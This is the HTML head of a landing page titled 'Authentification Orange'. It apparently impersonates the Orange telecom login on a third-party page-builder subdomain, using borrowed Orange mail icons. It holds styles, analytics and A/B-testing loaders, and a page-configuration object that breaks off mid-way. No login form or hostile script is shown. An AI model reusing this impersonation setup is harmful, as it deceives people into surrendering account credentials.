    <!DOCTYPE html>
<html xmlns:xlink="http://www.w3.org/1999/xlink" xml:lang="en" lang="en">
<head>
    <link rel="shortcut icon" href="https://us-as.gr-cdn.com/images/squeeze-page/_external.various.favico.png">
                <link rel="apple-touch-icon" sizes="57x57" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/apple-touch-icon-57x57.png"/>
        <link rel="apple-touch-icon" sizes="60x60" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/apple-touch-icon-60x60.png"/>
        <link rel="apple-touch-icon" sizes="72x72" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/apple-touch-icon-72x72.png"/>
        <link rel="apple-touch-icon" sizes="76x76" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/apple-touch-icon-76x76.png"/>
        <link rel="apple-touch-icon" sizes="114x114" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/apple-touch-icon-114x114.png"/>
        <link rel="apple-touch-icon" sizes="120x120" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/apple-touch-icon-120x120.png"/>
        <link rel="apple-touch-icon" sizes="144x144" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/apple-touch-icon-144x144.png"/>
        <link rel="apple-touch-icon" sizes="152x152" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/apple-touch-icon-152x152.png"/>
        <link rel="apple-touch-icon" sizes="180x180" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/apple-touch-icon-180x180.png"/>
        <link rel="icon" type="image/png" href="https://previews.123rf.com/images/photoart23d/photoart23d1902/photoart23d190200761/117590808-mail-symbol-symbol-orange-einfach-mit-abgerundeten-ecken-isoliert-vektor-illustration.jpg" sizes="32x32"/>
        <link rel="icon" type="image/png" href="https://pngset.com/images/download-mail-icon-orange-clipart-computer-icons-email-clip-art-envelope-airmail-transparent-png-1816138.png" sizes="194x194"/>
        <link rel="icon" type="image/png" href="https://pngset.com/images/download-mail-icon-orange-clipart-computer-icons-email-clip-art-envelope-airmail-transparent-png-1816138.png" sizes="96x96"/>
        <link rel="icon" type="image/png" href="https://pngset.com/images/download-mail-icon-orange-clipart-computer-icons-email-clip-art-envelope-airmail-transparent-png-1816138.png" sizes="192x192"/>
        <link rel="icon" type="image/png" href="https://pngset.com/images/download-mail-icon-orange-clipart-computer-icons-email-clip-art-envelope-airmail-transparent-png-1816138.png" sizes="16x16"/>
        <link rel="manifest" href="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/manifest.json"/>
        <link rel="shortcut icon" href="https://pngset.com/images/download-mail-icon-orange-clipart-computer-icons-email-clip-art-envelope-airmail-transparent-png-1816138.png"/>
        <meta name="msapplication-TileColor" content="#ff0000"/>
        <meta name="msapplication-TileImage" content="https://pngset.com/images/download-mail-icon-orange-clipart-computer-icons-email-clip-art-envelope-airmail-transparent-png-1816138.png"/>
        <meta name="msapplication-config" content="https://us-as.gr-cdn.com/images/squeeze-page/_external/various/favicons/browserconfig.xml"/>
        <meta name="theme-color" content="#ffffff"/>
        <title>Authentification Orange</title>
    <meta name="description" content=""/>
    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
    <meta http-equiv="content-language" content="en"/>
        <meta name="viewport" content="width=device-width, initial-scale=1.0"/>    <meta name="robots" content="index, follow"/>
        <meta property="og:title" content="authen-orange"/>
    <meta property="og:description" content=""/>
                <script type="text/javascript" src="/ruxitagentjs_ICA27QVfgjqrux_10235220309135426.js" data-dtconfig="rid=RID_2418|rpid=962116793|domain=gr8.com|reportUrl=/rb_bf70638ctp|app=ea7c4b59f27d43eb|rcdec=1209600000|featureHash=ICA27QVfgjqrux|msl=153600|srsr=1000|vcv=2|rdnt=1|uxrgce=1|bp=3|srmcrv=10|cuc=rd0m6seg|srms=1,1,,,,2,1,0,0%2Ftextarea%2Cinput%2Cselect%2Coption;0%2Fdatalist;0%2Fform%20button;0%2F%5Bdata-dtrum-input%5D;0%2F.data-dtrum-input;1%2F%5Edata%28%28%5C-.%2B%24%29%7C%24%29|mel=100000|ssv=4|lastModification=1647261688327|dtVersion=10235220309135426|srmcrl=1|tp=500,50,0,1|uxdcw=1500|agentUri=/ruxitagentjs_ICA27QVfgjqrux_10235220309135426.js"></script><link rel="stylesheet" href="https://us-as.gr-cdn.com/javascripts/core/lps/dist/reset-styles.146b8ec4963fecae9c0d.css" crossorigin="anonymous"/>
    <link rel="stylesheet" href="https://us-as.gr-cdn.com/javascripts/core/lps/dist/core-styles.51365b9560bf3abdc8cb.css" crossorigin="anonymous" />
    <link rel="stylesheet" href="https://us-as.gr-cdn.com/javascripts/core/lps/dist/webform-styles.da452ed17aade0ce6acd.css" crossorigin="anonymous" />
    <link rel="stylesheet" href="https://us-as.gr-cdn.com/images/common/templates/landing/208/1/css/style.css" crossorigin="anonymous" />
                        <style id="def-mark" type="text/css">div#edi-efhqg3w .text-content { font-size: 20px; }
div#edi-kf4it45 .text-content { font-size: 25px; }
div#edi-kf4it45 { visibility: visible; width: 350px; height: auto; top: 467px; left: 103.4px; transform-origin: 0px 0px 0px; z-index: 2; }
div#edi-efhqg3w { visibility: visible; width: 840px; height: auto; top: 552px; left: 103.4px; transform-origin: 0px 0px 0px; z-index: 2; }
div#edi-41f4ysd { visibility: visible; width: 250px; height: 75px; top: 866px; left: 365.4px; transform-origin: 0px 0px 0px; z-index: 2; background-color: rgb(237, 130, 50); background-image: none; }
div#edi-f2plr3u { visibility: visible; width: 386px; height: auto; top: 1058px; left: 103px; transform-origin: 0px 0px 0px; z-index: 2; }
div#edi-6q1n083 img { width: 251px; height: 253px; top: 15px; left: 78px; }
div#edi-6q1n083 { visibility: visible; width: 413px; height: 309.75px; background-size: 251px 253px; top: 122px; left: 22.4px; transform-origin: 0px 0px 0px; z-index: 2; background-image: url("https://us-ms.gr-cdn.com/getresponse-Qk5WR/photos/f42be118-86c4-4237-afb7-ed991a9953dd.png"); background-position: 78px 15px; background-repeat: no-repeat; }
div#edi-ph17d4d { top: 22px; left: 13px; width: 277px; height: auto; z-index: 2; }
div#edi-mrqda8l img { width: 209px; height: 155px; }
div#edi-mrqda8l { top: 66px; left: 48px; width: 209px; height: 155px; background-size: 209px; background-image: url("https://telesforddurand-695921.gr8.com/images/common/templates/landing/208/1/img/208_04.png"); background-position: 0px 0px; background-repeat: no-repeat; }
div#edi-ctz2g4v { top: 252px; left: 13px; width: 277px; height: auto; }
div#edi-eko2etj { top: 303px; left: 13px; width: 277px; height: auto; }
div#edi-zrr0few { top: 343px; left: 13px; width: 277px; height: auto; }
div#edi-aopei5p { width: 240px; height: auto; }
div#edi-2ykw4wd { top: 29px; width: 240px; height: auto; }
div#edi-v6rbkhj { top: 58px; width: 240px; height: auto; }
div#edi-cdsqtzc { top: 385px; left: 41px; width: 240px; height: 91px; }
div#edi-0rx5wwm { top: 508px; left: 72px; width: 161px; height: 46px; }
div#edi-pc54bdc { top: 22px; left: 13px; width: 277px; height: auto; z-index: 2; }
div#edi-1ctm9n6 img { width: 209px; height: 155px; }
div#edi-1ctm9n6 { top: 66px; left: 48px; width: 209px; height: 155px; background-size: 209px; background-image: url("https://telesforddurand-695921.gr8.com/images/common/templates/landing/208/1/img/208_04.png"); background-position: 0px 0px; background-repeat: no-repeat; }
div#edi-itm2qsm { top: 252px; left: 13px; width: 277px; height: auto; }
div#edi-r9tbiln { top: 303px; left: 13px; width: 277px; height: auto; }
div#edi-cizlhn9 { top: 343px; left: 13px; width: 277px; height: auto; }
div#edi-nkyt3wg { width: 240px; height: auto; }
div#edi-uh3mhj0 { top: 29px; width: 240px; height: auto; }
div#edi-orll4kb { top: 58px; width: 240px; height: auto; }
div#edi-tnbsvxb { top: 385px; left: 41px; width: 240px; height: 91px; }
div#edi-cuwzvyh { top: 508px; left: 72px; width: 161px; height: 46px; }
div#edi-w1zvy18 { top: 22px; left: 13px; width: 277px; height: auto; z-index: 2; }
div#edi-q7ohs5z img { width: 209px; height: 155px; }
div#edi-q7ohs5z { top: 66px; left: 48px; width: 209px; height: 155px; background-size: 209px; background-image: url("https://telesforddurand-695921.gr8.com/images/common/templates/landing/208/1/img/208_04.png"); background-position: 0px 0px; background-repeat: no-repeat; }
div#edi-ytyqkd8 { top: 252px; left: 13px; width: 277px; height: auto; }
div#edi-8w2e4gc { top: 303px; left: 13px; width: 277px; height: auto; }
div#edi-0j9epl8 { top: 343px; left: 13px; width: 277px; height: auto; }
div#edi-6azleac { width: 240px; height: auto; }
div#edi-1ytd0zw { top: 29px; width: 240px; height: auto; }
div#edi-8uhkjku { top: 58px; width: 240px; height: auto; }
div#edi-1amhfxa { top: 385px; left: 41px; width: 240px; height: 91px; }
div#edi-5r5x1hb { top: 508px; left: 72px; width: 161px; height: 46px; }
div#edi-a91l1od img { width: 38px; height: 39px; }
div#edi-a91l1od { top: 48px; left: 476px; width: 38px; height: 39px; background-size: 38px; background-image: url("https://telesforddurand-695921.gr8.com/images/common/templates/landing/208/1/img/208_05.png"); background-position: 0px 0px; background-repeat: no-repeat; }
div#edi-9al1md5 { top: 98px; left: 20px; width: 950px; height: auto; }
div#edi-kmjhg3a img { width: 123px; height: 27px; }
div#edi-kmjhg3a { left: 131px; width: 123px; height: 27px; background-size: 123px; background-image: url("https://telesforddurand-695921.gr8.com/images/common/templates/landing/208/1/img/208_06.png"); background-position: 0px 0px; background-repeat: no-repeat; }
div#edi-8fphpha { top: 48px; left: 40px; width: 170px; height: auto; }
div#edi-mgxsdh7 { top: 48px; left: 220px; width: 130px; height: auto; }
section#section-8d1krxh [data-section="wrap"] { width: 980px; }
section#section-8d1krxh { height: 1284px; z-index: 2; }
section#section-ihxqee0 [data-section="wrap"] { width: 980px; }
section#section-ihxqee0 { z-index: 2; }</style><style id="def-mark-hover" type="text/css" disabled="true"></style><style id="def-mark-phone" type="text/css" media="only screen and (max-width: 600px)">section#section-8d1krxh { height: 746px; }
div#edi-f2plr3u { top: 523px; left: 7px; width: 386px; text-align: center; }
div#edi-41f4ysd { top: 433px; left: 75px; width: 250px; }
div#edi-efhqg3w { -webkit-transform: scale(0.440476);-moz-transform: scale(0.440476);-ms-transform: scale(0.440476);transform: scale(0.440476); transform-origin: 0px 0px 0px; top: 348px; left: 15px; text-align: center; }
div#edi-kf4it45 { top: 308px; left: 25px; width: 350px; text-align: center; }
div#edi-6q1n083 { -webkit-transform: scale(0.895884);-moz-transform: scale(0.895884);-ms-transform: scale(0.895884);transform: scale(0.895884); transform-origin: 0px 0px 0px; top: 15px; left: 15px; }
section#section-8d1krxh [data-section="wrap"] { width: 400px; }
section#section-ihxqee0 [data-section="wrap"] { width: 400px; }
[data-editable="text"] { text-align: center; }
[hidden-on-phone="true"] { display: none; }</style>
                            <script type="text/javascript">
            var _vwo_code=(function(){
                var account_id=4859,
                    settings_tolerance=2000,
                    library_tolerance=1500,
                    use_existing_jquery=false,
                    // DO NOT EDIT BELOW THIS LINE
                    f=false,d=document;return{use_existing_jquery:function(){return use_existing_jquery;},library_tolerance:function(){return library_tolerance;},finish:function(){if(!f){f=true;var a=d.getElementById('_vis_opt_path_hides');if(a)a.parentNode.removeChild(a);}},finished:function(){return f;},load:function(a){var b=d.createElement('script');b.src=a;b.type='text/javascript';b.innerText;b.onerror=function(){_vwo_code.finish();};d.getElementsByTagName('head')[0].appendChild(b);},init:function(){settings_timer=setTimeout('_vwo_code.finish()',settings_tolerance);this.load('//dev.visualwebsiteoptimizer.com/j.php?a='+account_id+'&amp;u='+encodeURIComponent(d.URL)+'&amp;r='+Math.random());var a=d.createElement('style'),b='body{opacity:0 !important;filter:alpha(opacity=0) !important;background:none !important;}',h=d.getElementsByTagName('head')[0];a.setAttribute('id','_vis_opt_path_hides');a.setAttribute('type','text/css');if(a.styleSheet)a.styleSheet.cssText=b;else a.appendChild(d.createTextNode(b));h.appendChild(a);return settings_timer;}};}());_vwo_settings_timer=_vwo_code.init();
        </script>
            

<!-- Getresponse Analytics -->
<script type="text/javascript" src="https://ga2.getresponse.com/script/ga.js?grid=sBDcBX0JRfXwJA3Y%3D" async></script>
<!-- End Getresponse Analytics -->

    <script type="text/javascript">
    var grLpsInitialData = {
        userId: 'Qk5WR',
        google_adwords_id: '',
        google_adwords_conversion_label: '',
        country_phone_codes: JSON.parse('[{"cc":"af","code":"93","name":"Afghanistan","format":null},{"cc":"al","code":"355","name":"Albania","format":null},{"cc":"dz","code":"213","name":"Algeria","format":null},{"cc":"as","code":"1684","name":"American Samoa","format":"XXX-XXXX"},{"cc":"ad","code":"376","name":"Andorra","format":null},{"cc":"ao","code":"244","name":"Angola","format":null},{"cc":"ai","code":"1264","name":"Anguilla","format":"XXX-XXXX"},{"cc":"aq","code":"672","name":"Antarctica","format":null},{"cc":"ag","code":"1268","name":"Antigua & Barbuda","format":"XXX-XXXX"},{"cc":"ar","code":"54","name":"Argentina","format":null},{"cc":"am","code":"374","name":"Armenia","format":null},{"cc":"aw","code":"297","name":"Aruba","format":null},{"cc":"au","code":"61","name":"Australia","format":null},{"cc":"at","code":"43","name":"Austria","format":null},{"cc":"az","code":"994","name":"Azerbaijan","format":null},{"cc":"bs","code":"1242","name":"Bahamas","format":"XXX-XXXX"},{"cc":"bh","code":"973","name":"Bahrain","format":null},{"cc":"bd","code":"880","name":"Bangladesh","format":null},{"cc":"bb","code":"1246","name":"Barbados","format":null},{"cc":"by","code":"375","name":"Belarus","format":null},{"cc":"be","code":"32","name":"Belgium","format":null},{"cc":"bz","code":"501","name":"Belize","format":null},{"cc":"bj","code":"229","name":"Benin","format":null},{"cc":"bm","code":"1441","name":"Bermuda","format":"XXX-XXXX"},{"cc":"bt","code":"975","name":"Bhutan","format":null},{"cc":"bo","code":"591","name":"Bolivia","format":null},{"cc":"ba","code":"387","name":"Bosnia and Herzegovina","format":null},{"cc":"bw","code":"267","name":"Botswana","format":null},{"cc":"br","code":"55","name":"Brazil","format":null},{"cc":"io","code":"246","name":"British Indian Ocean Territory","format":null},{"cc":"bn","code":"673","name":"Brunei Darussalam","format":null},{"cc":"bg","code":"359","name":"Bulgaria","format":null},{"cc":"bf","code":"226","name":"Burkina Faso","format":null},{"cc":"bi","code":"257","name":"Burundi","format":null},{"cc":"kh","code":"855","name":"Cambodia","format":null},{"cc":"cm","code":"237","name":"Cameroon","format":null},{"cc":"ca","code":"1","name":"Canada","format":"(XXX) XXX-XXXX"},{"cc":"cv","code":"238","name":"Cape Verde","format":null},{"cc":"ky","code":"1345","name":"Cayman Islands","format":"XXX-XXXX"},{"cc":"cf","code":"236","name":"Central African Republic","format":null},{"cc":"td","code":"235","name":"Chad","format":null},{"cc":"cl","code":"56","name":"Chile","format":null},{"cc":"cn","code":"86","name":"China","format":null},{"cc":"cx","code":"61","name":"Christmas Island","format":null},{"cc":"cc","code":"61","name":"Cocos Islands (Keeling) ","format":null},{"cc":"co","code":"57","name":"Colombia","format":null},{"cc":"km","code":"269","name":"Comoros","format":null},{"cc":"cg","code":"242","name":"Congo","format":null},{"cc":"cd","code":"243","name":"Democratic Republic of the Congo","format":null},{"cc":"ck","code":"682","name":"Cook Islands","format":null},{"cc":"cr","code":"506","name":"Costa Rica","format":null},{"cc":"ci","code":"225","name":"Cote d\u0027Ivoire","format":null},{"cc":"hr","code":"385","name":"Croatia","format":null},{"cc":"cu","code":"53","name":"Cuba","format":null},{"cc":"cy","code":"357","name":"Cyprus","format":null},{"cc":"cz","code":"420","name":"Czech Republic","format":null},{"cc":"dk","code":"45","name":"Denmark","format":null},{"cc":"dj","code":"253","name":"Djibouti","format":null},{"cc":"dm","code":"1767","name":"Dominica","format":"XXX-XXXX"},{"cc":"do","code":"1809","name":"Dominican Republic","format":"XXX-XXXX"},{"cc":"do","code":"1829","name":"Dominican Republic","format":"XXX-XXXX"},{"cc":"do","code":"1849","name":"Dominican Republic","format":"XXX-XXXX"},{"cc":"ec","code":"593","name":"Ecuador","format":null},{"cc":"eg","code":"20","name":"Egypt","format":null},{"cc":"sv","code":"503","name":"El Salvador","format":null},{"cc":"gq","code":"240","name":"Equatorial Guinea","format":null},{"cc":"er","code":"291","name":"Eritrea","format":null},{"cc":"ee","code":"372","name":"Estonia","format":null},{"cc":"et","code":"251","name":"Ethiopia","format":null},{"cc":"fk","code":"500","name":"Falkland Islands (Malvinas)","format":null},{"cc":"fo","code":"298","name":"Faroe Islands","format":null},{"cc":"fj","code":"679","name":"Fiji","format":null},{"cc":"fi","code":"358","name":"Finland","format":null},{"cc":"fr","code":"33","name":"France","format":"X XX XX XX XX"},{"cc":"pf","code":"689","name":"French Polynesia","format":null},{"cc":"ga","code":"241","name":"Gabon","format":null},{"cc":"gm","code":"220","name":"Gambia","format":null},{"cc":"ge","code":"995","name":"Georgia","format":null},{"cc":"de","code":"49","name":"Germany","format":null},{"cc":"gh","code":"233","name":"Ghana","format":null},{"cc":"gi","code":"350","name":"Gibraltar","format":null},{"cc":"gr","code":"30","name":"Greece","format":null},{"cc":"gl","code":"299","name":"Greenland","format":null},{"cc":"gd","code":"1473","name":"Grenada","format":"XXX-XXXX"},{"cc":"gu","code":"1671","name":"Guam","format":"XXX-XXXX"},{"cc":"gt","code":"502","name":"Guatemala","format":null},{"cc":"gg","code":"441481","name":"Guernsey","format":null},{"cc":"gn","code":"224","name":"Guinea","format":null},{"cc":"gw","code":"245","name":"Guinea-bissau","format":null},{"cc":"gy","code":"592","name":"Guyana","format":null},{"cc":"ht","code":"509","name":"Haiti","format":null},{"cc":"hn","code":"504","name":"Honduras","format":null},{"cc":"hk","code":"852","name":"Hong Kong","format":"XXXX XXXX"},{"cc":"hu","code":"36","name":"Hungary","format":null},{"cc":"is","code":"354","name":"Iceland","format":null},{"cc":"in","code":"91","name":"India","format":"XXXXX-XXXXX"},{"cc":"id","code":"62","name":"Indonesia","format":null},{"cc":"ir","code":"98","name":"Islamic Republic of Iran","format":null},{"cc":"iq","code":"964","name":"Iraq","format":null},{"cc":"ie","code":"353","name":"Ireland","format":null},{"cc":"im","code":"441624","name":"Isle of man","format":null},{"cc":"il","code":"972","name":"Israel","format":null},{"cc":"it","code":"39","name":"Italy","format":null},{"cc":"jm","code":"1876","name":"Jamaica","format":"XXX-XXXX"},{"cc":"jp","code":"81","name":"Japan","format":null},{"cc":"je","code":"441534","name":"Jersey","format":null},{"cc":"jo","code":"962","name":"Jordan","format":null},{"cc":"kz","code":"7","name":"Kazakhstan","format":"(XXX) XXX XX XX"},{"cc":"ke","code":"254","name":"Kenya","format":null},{"cc":"ki","code":"686","name":"Kiribati","format":null},{"cc":"kp","code":"850","name":"Democratic People\u0027s Republic of Korea","format":null},{"cc":"kr","code":"82","name":"Republic of Korea","format":null},{"cc":"kw","code":"965","name":"Kuwait","format":null},{"cc":"kg","code":"996","name":"Kyrgyzstan","format":null},{"cc":"la","code":"856","name":"People\u0027s Democratic Republic of Lao","format":null},{"cc":"lv","code":"371","name":"Latvia","format":null},{"cc":"lb","code":"961","name":"Lebanon","format":null},{"cc":"ls","code":"266","name":"Lesotho","format":null},{"cc":"lr","code":"231","name":"Liberia","format":null},{"cc":"ly","code":"218","name":"Libya","format":null},{"cc":"li","code":"423","name":"Liechtenstein","format":null},{"cc":"lt","code":"370","name":"Lithuania","format":null},{"cc":"lu","code":"352","name":"Luxembourg","format":null},{"cc":"mo","code":"853","name":"Macao","format":null},{"cc":"mk","code":"389","name":"North Macedonia","format":null},{"cc":"mg","code":"261","name":"Madagascar","format":null},{"cc":"mw","code":"265","name":"Malawi","format":null},{"cc":"my","code":"60","name":"Malaysia","format":null},{"cc":"mv","code":"960","name":"Maldives","format":null},{"cc":"ml","code":"223","name":"Mali","format":null},{"cc":"mt","code":"356","name":"Malta","format":null},{"cc":"mh","code":"692","name":"Marshall Islands","format":null},{"cc":"mr","code":"222","name":"Mauritania","format":null},{"cc":"mu","code":"230","name":"Mauritius","format":null},{"cc":"yt","code":"262","name":"Mayotte","format":null},{"cc":"mx","code":"52","name":"Mexico","format":"XXX XXX XXXX"},{"cc":"fm","code":"691","name":"Federated States of Micronesia","format":null},{"cc":"md","code":"373","name":"Republic of Moldova","format":null},{"cc":"mc","code":"377","name":"Monaco","format":null},{"cc":"mn","code":"976","name":"Mongolia","format":null},{"cc":"me","code":"382","name":"Montenegro","format":null},{"cc":"ms","code":"1664","name":"Montserrat","format":"XXX-XXXX"},{"cc":"ma","code":"212","name":"Morocco","format":null},{"cc":"mz","code":"258","name":"Mozambique","format":null},{"cc":"mm","code":"95","name":"Myanmar","format":null},{"cc":"na","code":"264","name":"Namibia","format":null},{"cc":"nr","code":"674","name":"Nauru","format":null},{"cc":"np","code":"977","name":"Nepal","format":null},{"cc":"nl","code":"31","name":"Netherlands","format":null},{"cc":"an","code":"599","name":"Netherlands Antilles","format":null},{"cc":"nc","code":"687","name":"New Caledonia","format":null},{"cc":"nz","code":"64","name":"New Zealand","format":null},{"cc":"ni","code":"505","name":"Nicaragua","format":null},{"cc":"ne","code":"227","name":"Niger","format":null},{"cc":"ng","code":"234","name":"Nigeria","format":null},{"cc":"nu","code":"683","name":"Niue","format":null},{"cc":"mp","code":"1670","name":"Northern Mariana Islands","format":"XXX-XXXX"},{"cc":"no","code":"47","name":"Norway","format":null},{"cc":"om","code":"968","name":"Oman","format":null},{"cc":"pk","code":"92","name":"Pakistan","format":null},{"cc":"pw","code":"680","name":"Palau","format":null},{"cc":"ps","code":"970","name":"Occupied Palestinian Territory","format":null},{"cc":"pa","code":"507","name":"Panama","format":null},{"cc":"pg","code":"675","name":"Papua New Guinea","format":null},{"cc":"py","code":"595","name":"Paraguay","format":null},{"cc":"pe","code":"51","name":"Peru","format":null},{"cc":"ph","code":"63","name":"Philippines","format":null},{"cc":"pn","code":"64","name":"Pitcairn","format":null},{"cc":"pl","code":"48","name":"Poland","format":"XXX XXX XXX"},{"cc":"pt","code":"351","name":"Portugal","format":null},{"cc":"pr","code":"1787","name":"Puerto Rico","format":"XXX-XXXX"},{"cc":"pr","code":"1939","name":"Puerto Rico","format":"XXX-XXXX"},{"cc":"qa","code":"974","name":"Qatar","format":null},{"cc":"re","code":"262","name":"R\u00e9union","format":null},{"cc":"ro","code":"40","name":"Romania","format":null},{"cc":"ru","code":"7","name":"Russian Federation","format":null},{"cc":"rw","code":"250","name":"Rwanda","format":null},{"cc":"bl","code":"590","name":"Saint Barth\u00e9lemy","format":null},{"cc":"sh","code":"290","name":"Saint Helena","format":null},{"cc":"kn","code":"1869","name":"Saint Kitts and Nevis","format":"XXX-XXXX"},{"cc":"lc","code":"1758","name":"Saint Lucia","format":"XXX-XXXX"},{"cc":"mf","code":"590","name":"Saint Martin","format":null},{"cc":"pm","code":"508","name":"Saint Pierre and Miquelon","format":null},{"cc":"vc","code":"1784","name":"Saint Vincent and the Grenadines","format":"XXX-XXXX"},{"cc":"ws","code":"685","name":"Samoa","format":null},{"cc":"sm","code":"378","name":"San Marino","format":null},{"cc":"st","code":"239","name":"Sao Tome and Principe","format":null},{"cc":"sa","code":"966","name":"Saudi Arabia","format":null},{"cc":"sn","code":"221","name":"Senegal","format":null},{"cc":"rs","code":"381","name":"Serbia","format":null},{"cc":"sc","code":"248","name":"Seychelles","format":null},{"cc":"sl","code":"232","name":"Sierra Leone","format":null},{"cc":"sg","code":"65","name":"Singapore","format":null},{"cc":"sk","code":"421","name":"Slovakia","format":null},{"cc":"si","code":"386","name":"Slovenia","format":null},{"cc":"sb","code":"677","name":"Solomon Islands","format":null},{"cc":"so","code":"252","name":"Somalia","format":null},{"cc":"za","code":"27","name":"South Africa","format":null},{"cc":"es","code":"34","name":"Spain","format":null},{"cc":"lk","code":"94","name":"Sri Lanka","format":null},{"cc":"sd","code":"249","name":"Sudan","format":null},{"cc":"sr","code":"597","name":"Suriname","format":null},{"cc":"sj","code":"47","name":"Svalbard and Jan Mayen","format":null},{"cc":"sz","code":"268","name":"Swaziland","format":null},{"cc":"se","code":"46","name":"Sweden","format":null},{"cc":"ch","code":"41","name":"Switzerland","format":null},{"cc":"sy","code":"963","name":"Syrian Arab Republic","format":null},{"cc":"tw","code":"886","name":"Taiwan","format":"XXX XXXXXX"},{"cc":"tj","code":"992","name":"Tajikistan","format":null},{"cc":"tz","code":"255","name":"United Republic Of Tanzania","format":null},{"cc":"th","code":"66","name":"Thailand","format":null},{"cc":"tl","code":"670","name":"Timor-Leste","format":null},{"cc":"tg","code":"228","name":"Togo","format":null},{"cc":"tk","code":"690","name":"Tokelau","format":null},{"cc":"to","code":"676","name":"Tonga","format":null},{"cc":"tt","code":"1868","name":"Trinidad and Tobago","format":"XXX-XXXX"},{"cc":"tn","code":"216","name":"Tunisia","format":null},{"cc":"tr","code":"90","name":"Turkey","format":null},{"cc":"tm","code":"993","name":"Turkmenistan","format":null},{"cc":"tc","code":"1649","name":"Turks and Caicos Islands","format":"XXX-XXXX"},{"cc":"tv","code":"688","name":"Tuvalu","format":null},{"cc":"ug","code":"256","name":"Uganda","format":null},{"cc":"ua","code":"380","name":"Ukraine","format":null},{"cc":"ae","code":"971","name":"United Arab Emirates","format":null},{"cc":"gb","code":"44","name":"United Kingdom","format":"XXX XXX XXXX"},{"cc":"us","code":"1","name":"United States","format":"(XXX) XXX-XXXX"},{"cc":"uy","code":"598","name":"Uruguay","format":null},{"cc":"uz","code":"998","name":"Uzbekistan","format":null},{"cc":"vu","code":"678","name":"Vanuatu","format":null},{"cc":"va","code":"379","name":"Vatican City State","format":null},{"cc":"ve","code":"58","name":"Venezuela","format":null},{"cc":"vn","code":"84","name":"Vietnam","format":null},{"cc":"vg","code":"1284","name":"British Virgin Islands","format":"XXX-XXXX"},{"cc":"vi","code":"1340","name":"U.S. Virgin Islands","format":"XXX-XXXX"},{"cc":"wf","code":"681","name":"Wallis and Futuna","format":null},{"cc":"eh","code":"212","name":"Western Sahara","format":null},{"cc":"ye","code":"967","name":"Yemen","format":null},{"cc":"zm","code":"260","name":"Zambia","format":null},{"cc":"zw","code":"263","name":"Zimbabwe","format":null},{"cc":"cw","code":"599","name":"Curacao","format":null},{"cc":"ss","code":"211","name":"South Sudan","format":null},{"cc":"sx","code":"1721","name":"Sint Maarten","format":null}]'),
        country_code: 'fr',
        l10n: {
            ModSqueezePageLPCCreatePageWebformWebformFieldsRequiredField: 'Cette\u0020information\u0020est\u0020obligatoire',
            ModSqueezePageLPCCreatePageAutoFunnelProductsNotSelected: 'Veuillez\u0020s\u00E9lectionner\u0020un\u0020produit',
            ModSqueezePageLPCCreatePageAutoFunnelBtnProcessingCaption: 'Traitement\u0020en\u0020cours',
            ModSqueezePageLPCCreatePageGrowlerErrorName: 'Erreur',
            ModSqueezePageLPCCreatePageGrowlerWarningName: 'Warning',
            ModSqueezePageLPCCreatePageGrowlerInfoName: 'Info',
            ModSqueezePageLPCCreatePageGrowlerSuccessName: 'Success',
            ModSqueezePageLPCFunnelConfirmationPageGoToURL: 'Aller\u0020\u00E0\u0020l\u2019URL',
            ModSqueezePageLPCFunnelConfirmationPageDownload: 'T\u00E9l\u00E9charger',
            ModSqueezePageLPCFunnelConfirmationPageProductDeliveryTokenTitle: 'Jeton\u0020d\u0027acc\u00E8s\u0020\u003A',
            ModSqueezePageLPCFunnelConfirmationPageJoinTheWebinar: 'Rejoindre\u0020le\u0020webinaire',
            ModSqueezePageLPCCreatePageInvalidDateFormat: 'Nous\u0020ne\u0020prenons\u0020pas\u0020en\u0020charge\u0020ce\u0020format\u0020de\u0020date\u0020et\u0020heure',
            ModSqueezePageLPCCreatePageDatePlaceholder: 'aaaa\u002Dmm\u002Djj',
            ModSqueezePageLPCFunnelOrderFormPaymentGrowlerNoPostalCodeError: 'We\u0027re\u0020sorry,\u0020but\u0020a\u0020postal\u0020code\u0020is\u0020required\u0020to\u0020complete\u0020this\u0020transaction.\u0020Please\u0020contact\u0020the\u0020vendor.',
        },
        thankyouurl: 'stay',
        thankyoutext: 'Merci !' || 'Thank you!',
        url: 'https://telesforddurand-695921.gr8.com/',
        url_to_old_mobile_styles: 'https://us-as.gr-cdn.com/javascripts/core/lps/dist/old-mobile-styles.13c25771a6f3d024d582.css',
        url_product_box_default_image: 'https://telesforddurand-695921.gr8.com/images/lps/img/productBoxDefaultImage.png',
        cdn: 'https://us-as.gr-cdn.com/',
        webinars: {
            settings: {
                read: false,
                write: false,
            },
            list: JSON.parse('' || null),
        },
        variantId: 'z2Pq6',
        webformApps: JSON.parse('[]'),
        GDPRFields: JSON.parse('[]'.replace(/\n/g, '\\n')),
        isCustomCodeAllowed: true,
        grBadge: JSON.parse('{"imageUrl":"","redirectUrl":""}') || { 'imageUrl': '', 'redirectUrl': '' },
        user_panel_lang: 'en',
        autoFunnel: {
            autoFunnelType: null,
            id: null,
            stepId: null,
            stepType: null,
            orderFormUrl: null,
            stripePaymentRequestButtonUrl: null,
            paymentProcessor: null,
            paymentProcessorToken: null,
            paymentStripeAPIKey: null,
            paymentStripeCountryCode: '' || 'US',
            processPaymentUrl: null,
            autoFunnelPaymentStatusUrl: null,
            cartId: null,
            formFieldsValues: [],
            boughtProducts: [],
            autoFunnelPaymentSquareLocationId: null,
            otoPageDismissUrl: null,
            otoPageAcceptUrl: null,
            enableOtoPageAction: '' === 'true',
        },
        eCommerceData: {
            shops: []        },
        crypto: 'getresponse',
        grChat: {
            status: 'disabled',
            urlParams: null
        },
        landingPageEncodedId: 'hsQrV',
        adsPixelId: null,
